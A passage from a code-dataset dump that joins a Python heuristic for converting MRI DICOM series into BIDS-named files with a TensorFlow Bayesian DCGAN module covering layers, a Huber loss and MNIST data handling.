\"DIFFUSION\",\n \"UNI\",\n] + [f\"TE{i}\" for i in range(9)]\n\n\ndef get_seq_bids_info(s):\n\n seq = {\n \"type\": \"anat\", # by default to make code concise\n \"label\": None,\n }\n\n seq_extra = {}\n for it in s.image_type[2:]:\n if it not in rec_exclude:\n seq_extra[\"rec\"] = it.lower()\n seq_extra[\"part\"] = \"mag\" if \"M\" in s.image_type else (\"phase\" if \"P\" in s.image_type else None)\n \n try:\n pedir = s.custom['pe_dir']\n if \"COL\" in pedir:\n pedir = \"AP\"\n else:\n pedir = \"LR\"\n pedir_pos = bool(\n s.custom['pe_dir_pos']\n )\n\n seq[\"dir\"] = pedir if pedir_pos else pedir[::-1]\n except:\n pass\n\n # label bodypart which are not brain, mainly for spine if we set the dicom fields at the console properly\n bodypart = s.custom['body_part'] #ex_dcm.dcm_data.get(\"BodyPartExamined\", None)\n if bodypart is not None and bodypart != \"BRAIN\":\n seq[\"bp\"] = bodypart.lower()\n print(seq)\n\n scan_options = s.custom['scan_options'] #ex_dcm.dcm_data.get(\"ScanOptions\", None)\n image_comments = s.custom['image_comments'] #ex_dcm.dcm_data.get(\"ImageComments\", [])\n\n # CMRR bold and dwi\n is_sbref = \"Single-band reference\" in image_comments\n print(s, is_sbref)\n\n # Anats\n if \"localizer\" in s.protocol_name.lower():\n seq[\"label\"] = \"localizer\"\n slice_orient = s.custom['slice_orient'] #ex_dcm.dcm_data.get([0x0051,0x100e]) \n# if 
slice_orient is not None:\n# seq['acq'] = slice_orient.value.lower()\n elif \"AAHead_Scout\" in s.protocol_name:\n seq[\"label\"] = \"scout\"\n elif (\n (s.dim4 == 1)\n and (\"T1\" in s.protocol_name)\n and (\"tfl3d1_16ns\" in s.sequence_name)\n ):\n seq[\"label\"] = \"T1w\"\n elif (\n (s.dim4 == 1) and (\"T2\" in s.protocol_name) and (\"spc_314ns\" in s.sequence_name)\n ):\n seq[\"label\"] = \"T2w\"\n elif (\n (\"*tfl3d1_16\" in s.sequence_name)\n and (s.dim4 == 1)\n and (\"mp2rage\" in s.protocol_name)\n and not (\"memp2rage\" in s.protocol_name)\n ):\n seq[\"label\"] = \"MP2RAGE\"\n if \"INV1\" in s.series_description:\n seq[\"inv\"] = 1\n elif \"INV2\" in s.series_description:\n seq[\"inv\"] = 2\n elif \"UNI\" in s.image_type:\n # seq['acq'] = 'UNI'\n seq[\"label\"] = \"UNIT1\" # TODO: validate\n\n # elif (s.dim4 == 1) and ('MTw' in s.protocol_name):\n # seq['label'] = 'MTw'\n # seq['acq'] = 'off'\n # if 'On' in s.protocol_name:\n # seq['acq'] = 'on'\n\n # GRE acquisition\n elif \"*fl3d1\" in s.sequence_name:\n seq[\"label\"] = \"MTS\"\n seq[\"mt\"] = \"on\" if scan_options == \"MT\" else \"off\"\n # do not work for multiple flip-angle, need data to find how to detect index\n seq[\"flip\"] = 2 if 'T1w' in s.series_id else 1\n\n elif \"tfl2d1\" in s.sequence_name:\n seq[\"type\"] = \"fmap\"\n seq[\"label\"] = \"TB1TFL\"\n seq[\"acq\"] = \"famp\" if \"flip angle map\" in image_comments else \"anat\"\n\n elif \"fm2d2r\" in s.sequence_name:\n seq[\"type\"] = \"fmap\"\n seq[\"label\"] = \"phasediff\" if \"phase\" in s.image_type else \"magnitude%d\"%s.custom['echo_number'] \n \n # SWI\n elif (s.dim4 == 1) and (\"swi3d1r\" in s.sequence_name):\n seq[\"type\"] = \"swi\"\n if not (\"MNIP\" in s.image_type):\n seq[\"label\"] = \"swi\"\n else:\n seq[\"label\"] = \"minIP\"\n\n # Siemens or CMRR diffusion sequence, exclude DERIVED (processing at the console)\n elif (\n (\"ep_b\" in s.sequence_name)\n or (\"ez_b\" in s.sequence_name)\n or (\"epse2d1_110\" in s.sequence_name)\n ) and not any(it in s.image_type for it in [\"DERIVED\", \"PHYSIO\"]):\n seq[\"type\"] = \"dwi\"\n seq[\"label\"] = \"sbref\" if is_sbref else \"dwi\"\n\n # dumb far-fetched heuristics, no info in dicoms see https://github.com/CMRR-C2P/MB/issues/305\n seq_extra[\"part\"] = 'phase' if s.custom['rescale_slope'] else 'mag'\n\n\n # CMRR or Siemens functional sequences\n elif \"epfid2d\" in s.sequence_name:\n seq[\"task\"] = get_task(s)\n\n # if no task, this is a fieldmap\n if \"AP\" in s.series_id and not seq[\"task\"]:\n seq[\"type\"] = \"fmap\"\n seq[\"label\"] = \"epi\"\n seq[\"acq\"] = \"sbref\" if is_sbref else \"bold\"\n else:\n seq[\"type\"] = \"func\"\n seq[\"label\"] = \"sbref\" if is_sbref else \"bold\"\n\n seq[\"run\"] = get_run(s)\n if s.is_motion_corrected:\n seq[\"rec\"] = \"moco\"\n\n \n ################## SPINAL CORD PROTOCOL #####################\n elif \"spcR_100\" in s.sequence_name:\n seq[\"label\"] = \"T2w\"\n # seq['bp'] = 'spine'\n elif \"*me2d1r3\" in s.sequence_name:\n seq[\"label\"] = \"T2starw\"\n\n if seq[\"label\"] == \"sbref\" and \"part\" in seq:\n del seq[\"part\"]\n \n return seq, seq_extra\n\n\ndef generate_bids_key(seq_type, seq_label, prefix, bids_info, show_dir=False, outtype=(\"nii.gz\",), **bids_extra):\n bids_info.update(bids_extra)\n suffix_parts = [\n None if not bids_info.get(\"task\") else \"task-%s\" % bids_info[\"task\"],\n None if not bids_info.get(\"acq\") else \"acq-%s\" % bids_info[\"acq\"],\n None if not bids_info.get(\"ce\") else \"ce-%s\" % bids_info[\"ce\"],\n None\n if not 
(bids_info.get(\"dir\") and show_dir)\n else \"dir-%s\" % bids_info[\"dir\"],\n None if not bids_info.get(\"rec\") else \"rec-%s\" % bids_info[\"rec\"],\n None if not bids_info.get(\"inv\") else \"inv-%d\" % bids_info[\"inv\"],\n None if not bids_info.get(\"tsl\") else \"tsl-%d\" % bids_info[\"tsl\"],\n None if not bids_info.get(\"loc\") else \"loc-%s\" % bids_info[\"loc\"],\n None if not bids_info.get(\"bp\") else \"bp-%s\" % bids_info[\"bp\"],\n None if not bids_info.get(\"run\") else \"run-%02d\" % int(bids_info[\"run\"]),\n None if not bids_info.get(\"echo\") else \"echo-%d\" % int(bids_info[\"echo\"]),\n None if not bids_info.get(\"flip\") else \"flip-%d\" % int(bids_info[\"flip\"]),\n None if not bids_info.get(\"mt\") else \"mt-%s\" % bids_info[\"mt\"],\n None if not bids_info.get(\"part\") else \"part-%s\" % bids_info[\"part\"],\n seq_label,\n ]\n # filter those which are None, and join with _\n suffix = \"_\".join(filter(bool, suffix_parts))\n \n return create_key(seq_type, suffix, prefix=prefix, outtype=outtype)\n\n\ndef infotodict(seqinfo):\n \"\"\"Heuristic evaluator for determining which runs belong where\n\n allowed template fields - follow python string module:\n\n item: index within category\n subject: participant id\n seqitem: run number during scanning\n subindex: sub index within group\n session: scan index for longitudinal acq\n \"\"\"\n\n #lgr.info(\"Processing %d seqinfo entries\", len(seqinfo))\n #lgr.info(seqinfo)\n\n info = OrderedDict()\n skipped, skipped_unknown = [], []\n current_run = 0\n run_label = None # run-\n dcm_image_iod_spec = None\n skip_derived = True\n\n outtype = (\"nii.gz\",)\n sbref_as_fieldmap = True # duplicate sbref in fmap dir to be used by topup\n #sbref_as_fieldmap = False # sbref as fieldmaps is still required to use fMRIPrep LTS.\n prefix = \"\"\n\n fieldmap_runs = {}\n all_bids_infos = {}\n\n for s in seqinfo:\n \n #ex_dcm = load_example_dcm(s)\n\n bids_info, bids_extra = get_seq_bids_info(s)\n all_bids_infos[s.series_id] = (bids_info, bids_extra)\n\n # XXX: skip derived sequences, we don't store them to avoid polluting\n # the directory, unless it is the motion corrected ones\n # (will get _rec-moco suffix)\n if (\n skip_derived\n and (s.is_derived or (\"MPR\" in s.image_type))\n and not s.is_motion_corrected\n and not \"UNI\" in s.image_type\n ):\n skipped.append(s.series_id)\n lgr.debug(\"Ignoring derived data %s\", s.series_id)\n continue\n\n seq_type = bids_info[\"type\"]\n seq_label = bids_info[\"label\"]\n\n if (seq_type == \"fmap\" and seq_label == \"epi\" and bids_extra['part']=='phase' and seq_label=='bold'):\n continue\n \n if ((seq_type == \"fmap\" and seq_label == \"epi\") or\n (sbref_as_fieldmap and seq_label == \"sbref\" and seq_type=='bold')\n ) and bids_info.get(\"part\") in [\"mag\", None]:\n pe_dir = bids_info.get(\"dir\", None)\n if not pe_dir in fieldmap_runs:\n fieldmap_runs[pe_dir] = 0\n fieldmap_runs[pe_dir] += 1\n # override the run number\n run_id = fieldmap_runs[pe_dir]\n\n # duplicate sbref to be used as fieldmap\n if sbref_as_fieldmap and seq_label == \"sbref\":\n suffix_parts = [\n \"acq-sbref\",\n None if not bids_info.get(\"ce\") else \"ce-%s\" % bids_info[\"ce\"],\n None if not pe_dir else \"dir-%s\" % bids_info[\"dir\"],\n \"run-%02d\" % run_id,\n \"epi\",\n ]\n suffix = \"_\".join(filter(bool, suffix_parts))\n template = create_key(\"fmap\", suffix, prefix=prefix, outtype=outtype)\n if template not in info:\n info[template] = []\n info[template].append(s.series_id)\n\n show_dir = seq_type in [\"fmap\", 
\"dwi\"] and not seq_label=='TB1TFL'\n\n template = generate_bids_key(seq_type, seq_label, prefix, bids_info, show_dir, outtype)\n\n if template not in info:\n info[template] = []\n info[template].append(s.series_id)\n \n\n if skipped:\n lgr.info(\"Skipped %d sequences: %s\" % (len(skipped), skipped))\n if skipped_unknown:\n lgr.warning(\n \"Could not figure out where to stick %d sequences: %s\"\n % (len(skipped_unknown), skipped_unknown)\n )\n\n info = dedup_bids_extra(info, all_bids_infos)\n info = get_dups_marked(info) # mark duplicate ones with __dup-0x suffix\n\n info = dict(\n info\n ) # convert to dict since outside functionality depends on it being a basic dict\n\n for k, i in info.items():\n lgr.info(f\"{k} {i}\")\n\n return info\n\n\ndef dedup_bids_extra(info, bids_infos):\n # add `rec-` or `part-` to dedup series originating from the same acquisition\n info = info.copy()\n for template, series_ids in list(info.items()):\n if len(series_ids) >= 2:\n lgr.warning(\"Detected %d run(s) for template %s: %s\",\n len(series_ids), template[0], series_ids)\n\n for extra in [\"rec\", \"part\"]:\n \n bids_extra_values = [bids_infos[sid][1].get(extra) for sid in series_ids]\n\n if len(set(bids_extra_values)) < 2:\n continue #does not differentiate series\n\n lgr.info(f\"dedup series using {extra}\")\n\n for sid in list(series_ids): #need a copy of list because we are removing elements in that loop\n\n series_bids_info, series_bids_extra = bids_infos[sid]\n\n new_template = generate_bids_key(\n series_bids_info[\"type\"],\n series_bids_info[\"label\"],\n \"\",\n series_bids_info,\n show_dir=series_bids_info[\"type\"] in [\"fmap\", \"dwi\"],\n outtype=(\"nii.gz\",),\n **{extra: series_bids_extra.get(extra)})\n\n if new_template not in info:\n info[new_template] = []\n info[new_template].append(sid)\n info[template].remove(sid)\n if not len(info[template]):\n del info[template]\n break\n return info\n","repo_name":"courtois-neuromod/ds_prep","sub_path":"mri/convert/heuristics_unf.py","file_name":"heuristics_unf.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"71426619098","text":"\"\"\" Reference\r\n 1. 
https://github.com/carpedm20/DCGAN-tensorflow/blob/master/model.py\r\n 2.\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.gridspec as gridspec\r\nimport os\r\nimport math\r\nimport time\r\n\r\nfrom collections import OrderedDict, defaultdict\r\nimport tensorflow as tf\r\nfrom sklearn import mixture\r\n\r\nimport warnings\r\nwarnings.simplefilter(action='ignore', category=FutureWarning)\r\n\r\n\r\n# Function to plot an MNIST image generated\r\n# - plot 8*8 images\r\ndef plot_generated_mnist_images(samples, size=(8, 8)):\r\n fig = plt.figure(figsize=size);\r\n gs = gridspec.GridSpec(size[0], size[1]);\r\n gs.update(wspace=0.05, hspace=0.05);\r\n\r\n for i, sample in enumerate(samples):\r\n ax = plt.subplot(gs[i]);\r\n plt.axis(\"off\");\r\n plt.imshow(sample.reshape(28, 28));\r\n\r\n return fig;\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef one_hot_encoder(class_numbers, num_classes):\r\n return np.eye(num_classes, dtype=float)[class_numbers];\r\n\r\n\r\nclass AttributeDict(dict):\r\n \"\"\"\r\n A class to use Dictionary in convenient way\r\n i.e object[\"key\"] => object.key\r\n \"\"\"\r\n def __getattr__(self, attr):\r\n return self[attr];\r\n\r\n def __setattr__(self, attr, value):\r\n self[attr] = value;\r\n\r\n def __hash__(self):\r\n return hash(tuple(sorted(self.items())));\r\n\r\n\r\ndef print_images(sampled_images, label, index, directory, save_all_samples=False):\r\n import matplotlib as mpl;\r\n mpl.use(\"Agg\");\r\n\r\n def un_normalize(img, cdim):\r\n img_out = np.zeros_like(img);\r\n for i in range(cdim):\r\n img_out[:, :, i] = 255.*((img[:, :, i] +1.)/2.0);\r\n\r\n img_out = img_out.astype(np.uint8);\r\n return img_out;\r\n\r\n if type(sampled_images) == np.ndarray:\r\n N, h, w, cdim = sampled_images.shape;\r\n idxs = np.random.choice(np.arange(N), size=(5, 5), replace=False);\r\n else:\r\n sampled_imgs, sampled_probs = sampled_images;\r\n sampled_images = sampled_imgs[sampled_probs.argsort()[::-1]];\r\n idxs = np.arange(5*5).reshape((5,5));\r\n N, h, w, cdim = sampled_images.shape;\r\n\r\n\r\n fig, axes = plt.subplots(5, 5);\r\n for i in range(5):\r\n for j in range(5):\r\n if cdim == 1:\r\n axes[i, j].imshow(un_normalize(sampled_images[idxs[i, j]], cdim)[:, :, 0], cmap=\"gray\");\r\n else:\r\n axes[i, j].imshow(un_normalize(sampled_images[idxs[i, j]], cdim));\r\n\r\n axes[i, j].axis(\"off\");\r\n axes[i, j].set_xticklabels([]);\r\n axes[i, j].set_yticklabels([]);\r\n axes[i, j].set_aspect(\"equal\");\r\n\r\n\r\n if not os.path.exists(directory):\r\n os.makedirs(directory);\r\n\r\n fig.savefig(os.path.join(directory + \"{}_{}.png\".format(label, index)),\r\n bbox_inches=\"tight\");\r\n plt.close(\"all\");\r\n\r\n if \"raw\" not in label.lower() and save_all_samples:\r\n np.savez_compressed(os.path.join(directory, \"samples_{}_{}.npz\".format(label, index)),\r\n samples=sampled_images);\r\n\r\n\r\nclass FigPrinter:\r\n\r\n def __init__(self, subplot_arg):\r\n import matplotlib as mpl\r\n mpl.use(\"Agg\");\r\n self.fig, self.axes = plt.subplots(*subplot_arg);\r\n\r\n def print_to_file(self, file_name, close_on_exit=True):\r\n import matplotlib as mpl\r\n mpl.use(\"Agg\");\r\n\r\n self.fig.savefig(file_name, bbox_inches=\"tight\");\r\n if close_on_exit:\r\n plt.close(\"all\");\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" A function for batch normalization layer \"\"\"\r\nclass batch_norm(object):\r\n def __init__(self, epsilon=1e-5, momentum=0.9, name=\"batch_norm\"):\r\n with tf.variable_scope(name,reuse=tf.AUTO_REUSE):\r\n self.epsilon = epsilon;\r\n 
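# 'momentum' here is the moving-average decay handed to tf.contrib.layers.batch_norm in __call__\r\n            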
self.momentum = momentum;\r\n self.name = name;\r\n\r\n def __call__(self, x, train=True):\r\n return tf.contrib.layers.batch_norm(x,\r\n decay=self.momentum,\r\n updates_collections=None,\r\n epsilon=self.epsilon,\r\n scale=True,\r\n is_training=train,\r\n scope=self.name);\r\n\r\n\r\n\"\"\" Functions for Convolution/inverse_Convolution/Full-connected layers \"\"\"\r\ndef conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n w=None, biases=None, name=\"conv2d\"):\r\n \"\"\" Make a convolution layer\r\n :param input_: input data\r\n :param output_dim: dim of output\r\n :param k_h: height of kernel(window)\r\n :param k_w: width of kernel(window)\r\n :param d_h: height of stride\r\n :param d_w: width of stride\r\n :param stddev: standard deviation for initializing w\r\n :param w: weight variables for convolution layer\r\n :param biases: bias variables for convolution layer\r\n :param name: variable name for tensorflow graph\r\n :return: output of convolution layer\r\n \"\"\"\r\n with tf.variable_scope(name,reuse=tf.AUTO_REUSE):\r\n if w is None:\r\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\r\n initializer=tf.truncated_normal_initializer(stddev=stddev));\r\n\r\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding=\"SAME\");\r\n\r\n if biases is None:\r\n biases = tf.get_variable('biases', [output_dim],\r\n initializer=tf.constant_initializer(0.0));\r\n\r\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape());\r\n return conv;\r\n\r\n\r\ndef deconv2d(input_, output_shape, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n name=\"deconv2d\", with_w=False, w=None, biases=None):\r\n \"\"\" Make a transposed_convolution layer\r\n :param input_: input data\r\n :param output_shape: shape of output\r\n :param k_h: height of kernel(window)\r\n :param k_w: width of kernel(window)\r\n :param d_h: height of stride\r\n :param d_w: width of stride\r\n :param stddev: standard deviation for initializing w\r\n :param name: variable name for tensorflow graph\r\n :param with_w: True => return w and biases also\r\n :param w: weight variables for convolution layer\r\n :param biases: bias variables for convolution layer\r\n :return: output of transposed_convolution layer\r\n \"\"\"\r\n\r\n with tf.variable_scope(name,reuse=tf.AUTO_REUSE):\r\n # filter = [h, w, output_channels, in_channels]\r\n if w is None:\r\n w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\r\n initializer=tf.random_normal_initializer(stddev=stddev));\r\n\r\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\r\n strides=[1, d_h, d_w, 1]);\r\n\r\n if biases is None:\r\n biases = tf.get_variable('biases', [output_shape[-1]],\r\n initializer=tf.constant_initializer(0.0));\r\n\r\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape());\r\n\r\n if with_w:\r\n return deconv, w, biases;\r\n else:\r\n return deconv;\r\n\r\n\r\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0,\r\n with_w=False, matrix=None, bias=None):\r\n\r\n \"\"\" Make a full-connected layer\r\n :param input_: input data\r\n :param output_size: size of output\r\n :param scope: variable scope for tensorflow graph\r\n :param stddev: standard deviation for initializing w\r\n :param bias_start:\r\n :param with_w: True => return w and biases also\r\n :param matrix: weight variables for full-connected layer\r\n :param bias: bias variables for full-connected layer\r\n :return: output of full-connected layer\r\n \"\"\"\r\n shape = 
input_.get_shape().as_list();\r\n\r\n    with tf.variable_scope(scope or \"Linear\",reuse=tf.AUTO_REUSE):\r\n        if matrix is None:\r\n            matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\r\n                                 tf.random_normal_initializer(stddev=stddev));\r\n\r\n        if bias is None:\r\n            bias = tf.get_variable(\"bias\", [output_size],\r\n                               initializer=tf.constant_initializer(bias_start))\r\n\r\n        if with_w:\r\n            return tf.matmul(input_, matrix) + bias, matrix, bias;\r\n        else:\r\n            return tf.matmul(input_, matrix) + bias;\r\n\r\n\r\n\"\"\" Some util functions for Convolution\r\nout_size = (input_size + 2*padding - kernel_size)/stride + 1\r\n\"\"\"\r\ndef conv_out_size(size, stride):\r\n    co = int(math.ceil(size / float(stride)));\r\n    return co;\r\n\r\n\r\ndef kernel_sizer(size, stride):\r\n    ko = int(math.ceil(size / float(stride)));\r\n\r\n    if ko % 2 == 0:\r\n        ko = ko+1;\r\n    return ko;\r\n\r\n\r\ndef get_strides(num_layers, num_pool):\r\n    interval = int(math.floor(num_layers/float(num_pool)));\r\n    strides = np.array([1]*num_layers);\r\n    strides[0:interval*num_pool:interval] = 2;\r\n    return strides;\r\n\r\n#TODO\r\n\"\"\" Huber loss \r\nReference : https://en.wikipedia.org/wiki/Huber_loss (revisit later)\r\n - a loss function used in robust regression,\r\n   which is less sensitive to outliers in the data than the squared error loss\r\n 1. Original definition\r\n : L_delta(a) \r\n    = 0.5*pow(a, 2)               ,if abs(a) < delta\r\n    = delta*(abs(a) - 0.5*delta)  ,otherwise\r\n    \r\n 2. Let a = y - f(x) where y: real value(label) and f(x): predicted value.\r\n    Then the Huber loss between real and predicted values is given by\r\n : L_delta(real, pred)\r\n    = 0.5*pow(real - pred, 2)                     ,if abs(real - pred) < delta\r\n    = delta*abs(real - pred) - 0.5*pow(delta, 2)  ,otherwise\r\n    \r\n : L_delta(real, pred)\r\n    = 0.5*pow(res, 2)                ,if res < delta\r\n    = delta*res - 0.5*pow(delta, 2)  ,otherwise\r\n    where res = abs(real - pred) \r\n\"\"\"\r\ndef huber_loss(labels, predictions, delta=1.0):\r\n    residual = tf.abs(predictions - labels);\r\n    condition = tf.less(residual, delta);\r\n    ret1 = 0.5 * tf.square(residual);\r\n    ret2 = delta*residual - 0.5*tf.square(delta);\r\n\r\n    return tf.where(condition, ret1, ret2);\r\n\r\n
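# Added worked example (illustrative): with delta = 1.0 a residual of 0.5 takes the\r\n# quadratic branch, 0.5*0.5**2 = 0.125, while a residual of 3.0 takes the linear\r\n# branch, 1.0*3.0 - 0.5*1.0**2 = 2.5, so large errors are penalized only linearly.\r\n\r\n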
- 1.).reshape((28, 28, 1))\r\n                                          for n in range(image_batch.shape[0])]);\r\n\r\n                class_id_idx = np.argmax(labels, axis=1) == class_id;\r\n\r\n                if np.any(class_id_idx):\r\n                    if class_id_batch.shape[0] == 0:\r\n                        class_id_batch = image_batch[class_id_idx];\r\n                    else:\r\n                        class_id_batch = np.concatenate([class_id_batch, image_batch[class_id_idx]]);\r\n\r\n            labels = np.zeros((batch_size, 10));\r\n            labels[:, class_id] = 1.0;\r\n            return class_id_batch[:batch_size], labels;\r\n\r\n\r\n    def test_batch(self, batch_size):\r\n        image_batch, labels = self.mnist.test.next_batch(batch_size);\r\n        new_image_batch = np.array([(image_batch[n] * 2. - 1.).reshape((28, 28, 1))\r\n                                    for n in range(image_batch.shape[0])]);\r\n\r\n        return new_image_batch, labels;\r\n\r\n    def get_test_set(self):\r\n        test_imgs = self.mnist.test.images;\r\n        test_images = np.array([(test_imgs[n]*2. - 1.).reshape((28, 28, 1))\r\n                                for n in range(test_imgs.shape[0])]);\r\n        test_labels = self.mnist.test.labels;\r\n\r\n        return test_images, test_labels;\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" Main : Bayesian GAN \"\"\"\r\nclass BDCGAN(object):\r\n    def __init__(self, x_dim, z_dim, dataset_size, batch_size=64,\r\n                 g_filter=64, d_filter=64,prior_std=1.0, num_layer=4,\r\n                 num_classes=2,\r\n                 J=1, M=1, J_d=None, eta=2e-4,\r\n                 alpha=0.01, lr=0.0002, optimizer=\"adam\",\r\n                 DCGAN=False):\r\n        \"\"\"\r\n        ================================================================\r\n        \r\n        :param x_dim: dim of input data(e.g mnist) for D\r\n        :param z_dim: dim of input data(noise) for G\r\n        :param dataset_size: the size of data in real data distribution\r\n        :param batch_size: batch size for mini-batch training\r\n        :param g_filter: dimension of convolution filter for G\r\n        :param d_filter: dimension of convolution filter for D\r\n        :param prior_std: Neural network prior std\r\n        :param num_layer: the number of layers in the network (G or D)\r\n        ================================================================\r\n        # TODO\r\n        \r\n        : (Stochastic Gradient Hamiltonian Monte Carlo)\r\n        :param J: the number of MC-samples of z to integrate in G (paper J_g)\r\n        :param M: the number of samplings in SGHMC\r\n        :param J_d: the number of MC-samples of z to integrate in D\r\n        :param eta:\r\n        :param alpha:\r\n        ================================================================\r\n        Classic DCGAN / False=>Bayesian GAN\r\n        \"\"\"\r\n        channels = x_dim[2];\r\n\r\n        self.is_gray = (channels==1);\r\n        self.optimizer = optimizer.lower();\r\n        self.dataset_size = dataset_size;\r\n        self.batch_size = batch_size;\r\n\r\n        self.K = num_classes #Fake or real classes\r\n        self.x_dim = x_dim;\r\n        self.z_dim = z_dim;\r\n\r\n        self.g_filter = g_filter;\r\n        self.d_filter = d_filter;\r\n        self.channels = channels;\r\n\r\n        self.lr = lr;\r\n\r\n\r\n        # Information for Bayes GAN\r\n        self.prior_std = prior_std;\r\n        self.num_G = J;\r\n        self.num_D = J_d if J_d is not None else 1;\r\n        self.num_mcmc = M;\r\n        self.eta = eta;\r\n        self.alpha = alpha;\r\n\r\n        # Information for classic DCGAN\r\n        self.DCGAN = DCGAN;\r\n        if self.DCGAN:\r\n            assert self.num_G == 1 and self.num_D == 1 and self.num_mcmc == 1, \\\r\n                "Invalid settings(J, J_d, M) for Classic DCGAN";\r\n        # TODO\r\n        self.noise_std = np.sqrt(2*self.alpha*self.eta);\r\n        # TODO\r\n        self.num_pool = 4;\r\n        # max_num_dfs : maximum number of filters\r\n        self.max_num_dfs = 512;\r\n        # G_strides : stride for G\r\n        self.G_strides = get_strides(num_layer, self.num_pool);\r\n        # D_strides = stride for D\r\n        self.D_strides = self.G_strides;\r\n\r\n\r\n\r\n        num_dfs = 
np.cumprod(np.array([self.d_filter] + list(self.D_strides)))[:-1];\r\n\r\n num_dfs[num_dfs >= self.max_num_dfs] = self.max_num_dfs;\r\n\r\n # num_d_features : list of the number of features in layers for D\r\n self.num_d_features = list(num_dfs);\r\n # num_g_features : list of the number of features in layers for G\r\n # : inverse of num_d_filters\r\n self.num_g_features = self.num_d_features[::-1];\r\n\r\n # D_batch_norm : Dictionary for Batch normalization layers for D\r\n self.D_batch_norm = None;\r\n # D_weight_dims : List of dimensions for W in each layer of D\r\n self.D_weight_dims = OrderedDict();\r\n # D_kernel_sizes : List of kernel size in Convolution layer in D\r\n self.D_kernel_sizes = None;\r\n\r\n # G_batch_norm : Dictionary for Batch normalization layers for G\r\n self.G_batch_norm = None;\r\n self.G_output_dims = OrderedDict();\r\n # G_weight_dims : dimensions for W in each layer of G\r\n self.G_weight_dims = OrderedDict();\r\n # G_kernel_sizes : List of kernel size in Convolution layer in G\r\n self.G_kernel_sizes = None;\r\n\r\n self.inputs = None;\r\n self.z = None;\r\n self.z_sampler = None;\r\n self.G_param_list = None;\r\n self.D_param_list = None;\r\n\r\n self.D_learning_rate = None;\r\n self.D_vars = None;\r\n\r\n # d_losses : list of d_loss of each D in SGHMC\r\n # d_train_ops : list minimizing operator of each D in SGHMC\r\n # d_train_ops_adam :\r\n self.d_losses, self.d_train_ops, self.d_train_ops_adam = None, None, None;\r\n\r\n self.G_learning_rate = None;\r\n self.G_vars = None;\r\n # g_losses : list of d_loss of each G in SGHMC\r\n # g_train_ops : list minimizing operator of each G in SGHMC\r\n # g_train_ops_adam :\r\n self.g_losses, self.g_train_ops, self.g_train_ops_adam = None, None, None;\r\n\r\n self.G_sampler = None;\r\n\r\n self.construct_from_hypers(g_kernel_size=5, g_strides=[2,2,2,2],\r\n d_kernel_size=5, d_strides=[2,2,2,2],\r\n num_dfs=self.num_d_features,\r\n num_gfs=self.num_g_features);\r\n\r\n\r\n\r\n self.build_graph();\r\n\r\n def construct_from_hypers(self,\r\n g_kernel_size=5, g_strides=[2,2,2,2],\r\n d_kernel_size=5, d_strides=[2,2,2,2],\r\n num_dfs=None, num_gfs=None):\r\n \"\"\"\r\n 1. _batch_norm : a list of batch normalization layer\r\n 2. 
_weight_dims : a ordered dict of tuples of the shape of W and b in each layer\r\n 3.\r\n :param g_kernel_size: starting kernel size of G\r\n :param g_strides: a list of strides of layers in G\r\n :param d_kernel_size: starting kernel size of D\r\n :param d_strides: a list of strides of layers in D\r\n :param num_dfs: list of the number of filters in Convolution layers for D\r\n :param num_gfs: list of the number of filters in Convolution layers for G\r\n \"\"\"\r\n\r\n\r\n\r\n self.D_batch_norm = AttributeDict([(\"d_bn\"+str(i), batch_norm(name=\"d_bn\"+str(i)))\r\n for i in range(len(d_strides))]);\r\n self.G_batch_norm = AttributeDict([(\"g_bn\"+str(i), batch_norm(name=\"g_bn\"+str(i)))\r\n for i in range(len(g_strides))]);\r\n\r\n if num_dfs is None:\r\n # Default : 64 -> 128 -> 256 -> 512\r\n num_dfs = [self.d_filter, self.d_filter*2, self.d_filter*4, self.d_filter*8];\r\n\r\n if num_gfs is None:\r\n # Default : 512 -> 256 -> 128 -> 64\r\n num_gfs = [self.g_filter*8, self.g_filter*4, self.g_filter*2, self.g_filter];\r\n\r\n\r\n # Check the validation of hyper-parameters\r\n assert len(g_strides) == len(num_gfs), \"Invalid Hyper-parameters\"\r\n assert len(d_strides) == len(num_dfs), \"Invalid Hyper-parameters\"\r\n\r\n\r\n\r\n # Generator\r\n g_h, g_w = self.x_dim[0], self.x_dim[1];\r\n ks = g_kernel_size;\r\n self.G_kernel_sizes = [ks];\r\n\r\n num_gfs = num_gfs + [self.channels];\r\n\r\n # Add shape of weights for convolution layer\r\n for layer in range(len(g_strides))[::-1]:\r\n self.G_output_dims[\"g_h\"+str(layer+1)+\"_out\"] = (g_h, g_w);\r\n\r\n assert g_strides[layer] <=2, \"Invalid Stride\";\r\n assert ks % 2 == 1, \"Invalid Kernel Size\";\r\n\r\n self.G_weight_dims[\"g_h\"+str(layer+1)+\"_W\"] = (ks, ks, num_gfs[layer+1], num_gfs[layer]);\r\n self.G_weight_dims[\"g_h\" + str(layer + 1) + \"_b\"] = (num_gfs[layer+1],);\r\n g_h, g_w = conv_out_size(g_h, g_strides[layer]), conv_out_size(g_w, g_strides[layer]);\r\n ks = kernel_sizer(ks, g_strides[layer]);\r\n self.G_kernel_sizes.append(ks);\r\n\r\n # Add shape of weights for a full connected layer\r\n self.G_weight_dims.update(OrderedDict([(\"g_h0_lin_W\", (self.z_dim, num_gfs[0] * g_h * g_w)),\r\n (\"g_h0_lin_b\", (num_gfs[0] * g_h * g_w,))]))\r\n\r\n self.G_output_dims[\"g_h0_out\"] = (g_h, g_w);\r\n\r\n\r\n # Discriminator\r\n d_h, d_w = self.x_dim[0], self.x_dim[1];\r\n num_dfs = [self.channels] + num_dfs;\r\n\r\n ks = d_kernel_size;\r\n self.D_kernel_sizes = 